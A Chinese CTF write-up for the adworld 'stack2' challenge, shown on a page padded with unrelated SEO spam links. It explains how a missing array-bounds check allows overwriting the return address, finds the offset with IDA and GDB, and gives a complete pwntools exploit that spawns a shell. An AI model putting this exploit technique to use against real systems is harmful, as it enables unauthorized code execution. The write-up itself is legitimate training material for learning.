当前位置: 首页 > news >正文

网站建设的特点友情链接有用吗

网站建设的特点,友情链接有用吗,网店推广方法有哪些,可以挣钱的网站adworld - stack2 题目概述:给一个数组(自己控制数组大小和填入的数据),并进行(展示, 增加, 修改值, 求平均值, 退出)菜单选项 存在后门函数(system(“/bin/bash”)),但是没找到栈溢出的点 没判断数组的边界造成任意地址修改 但是如何准确…

adworld - stack2

题目概述:给一个数组(自己控制数组大小和填入的数据),并进行(展示, 增加, 修改值, 求平均值, 退出)菜单选项
存在后门函数(system(“/bin/bash”)),但是没找到栈溢出的点

没判断数组的边界造成任意地址修改

但是如何准确无误的填入返回地址?

-> 这就需要寻找数组的首位地址距离返回地址的距离了(就与栈溢出寻找栈大小一样)

思路:通过IDA中汇编确定地址 到GDB中 下断点动调确定大小

1.寻找数组首地址

在这里插入图片描述

汇编没什么基础,建议复制粘贴询问AI,逐行解释,慢慢学习+理解

我的理解:eax寄存器保存返回值(输入的v7变量保存在eax寄存器中) — 寻找有关eax的赋值语句 — 赋值给了ecx寄存器

080486D5 mov [eax], cl

在这里插入图片描述

下断点,运行,数组长度为1,输入65(0X41),ECX寄存器存放有0x41,且要将低8位赋值给EAX寄存器指向的内存中(数组)

EAX寄存器 0xffffc8d8

2.寻找函数结束的地址

在这里插入图片描述

上面有代码 return 0; 这部分就是函数结束的地方了

retn时esp指向的地址是返回地址

0xffffc95c

在这里插入图片描述

ESP寄存器内地址 0xffffc95c

>>> 0xffffc8d8 - 0xffffc95c
-132

Exp

# stack2 32位 NX保护,Canary
from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'splitw', '-h']
# 有后门函数->寻找有没有栈溢出 -> 未检查数组边界, 造成任意地址修改
io = process('./stack2')
# io = remote("")
# 寻找参数距离返回地址的距离 0x84def send_num(addr, num):io.sendlineafter(b"5. exit\n", b"3")io.sendlineafter(b"which number to change:\n", str(addr))io.sendlineafter(b"new number:\n", str(num))# system_addr = 0x 08 04 84 50
# binsh_addr = 0x 08 04 89 87io.sendlineafter(b"How many numbers you have:\n", b"1")
io.sendlineafter(b"Give me your numbers\n", b"1")
# 直接从132位开始写 system_addr + return_addr + binsh
send_num(0x84, 0x50)
send_num(0x85, 0x84)
send_num(0x86, 0x04)
send_num(0x87, 0x08)
# 跳过中间四位的返回地址
send_num(0x8C, 0x87)
send_num(0x8D, 0x89)
send_num(0x8E, 0x04)
send_num(0x8F, 0x08)io.sendline(b"5")
io.interactive()

总结

  • 数组边界判断 — 访问任意内存地址
  • 汇编语言的了解
  • GDB动调

参考Wp

https://blog.csdn.net/ckk1314520/article/details/121070383

http://www.shuangfujiaoyu.com/news/60019.html

相关文章:

  • 石家庄有哪些公司可以做网站微信群推广网站
  • 微网站制作十大免费网站推广入口
  • 华亭县门户网站最简短的培训心得
  • 山西做网站的企业百度竞价排名服务
  • 谎称在赌博网站做维护seo是什么意思的缩写
  • 宝鸡网站建设排行榜google推广方式和手段有哪些
  • 河南seo公司企业网站seo案例分析
  • 武汉网站快速排名提升seo百度站长工具查询
  • 美发网站带手机版品牌运营具体做什么
  • 建设一个商城式网站可以吗广州今天刚刚发生的重大新闻
  • b2c商城网站营销方案seo和sem分别是什么
  • 合肥房产网58同城西安seo优化工作室
  • 怎么打帮人 做网站开发的广告凡科网建站系统源码
  • 邯郸做网站价格优质友情链接
  • 如何做网站大图片免费网站开发平台
  • 涉县住房与城乡建设厅网站汕头百度推广公司
  • 学生模拟网站开发搜索引擎优化的主要手段
  • 北京做的比较好的网站公司吗外贸网站推广平台有哪些
  • 打开一个不良网站提示创建成功杭州seo靠谱
  • 龙岩kk社区seo科技网
  • 安卓手机开发者模式seo营销策略
  • 正规html5成人网站企拓客app骗局
  • 江宁网站建设要多少钱电商平台app大全
  • 企业网站建设内存长沙seo霜天
  • 新手学做网站 pdfseo黑帽技术有哪些
  • 手机网站建设策划百度网盟推广官方网站
  • 简约 时尚 高端 网站建设互联网产品营销策划方案
  • 石家庄网站推广今天刚刚最新消息2023
  • 注销网站 取消接入seo文章代写一篇多少钱
  • 自己建立公司网站的步骤怎样做搜索引擎推广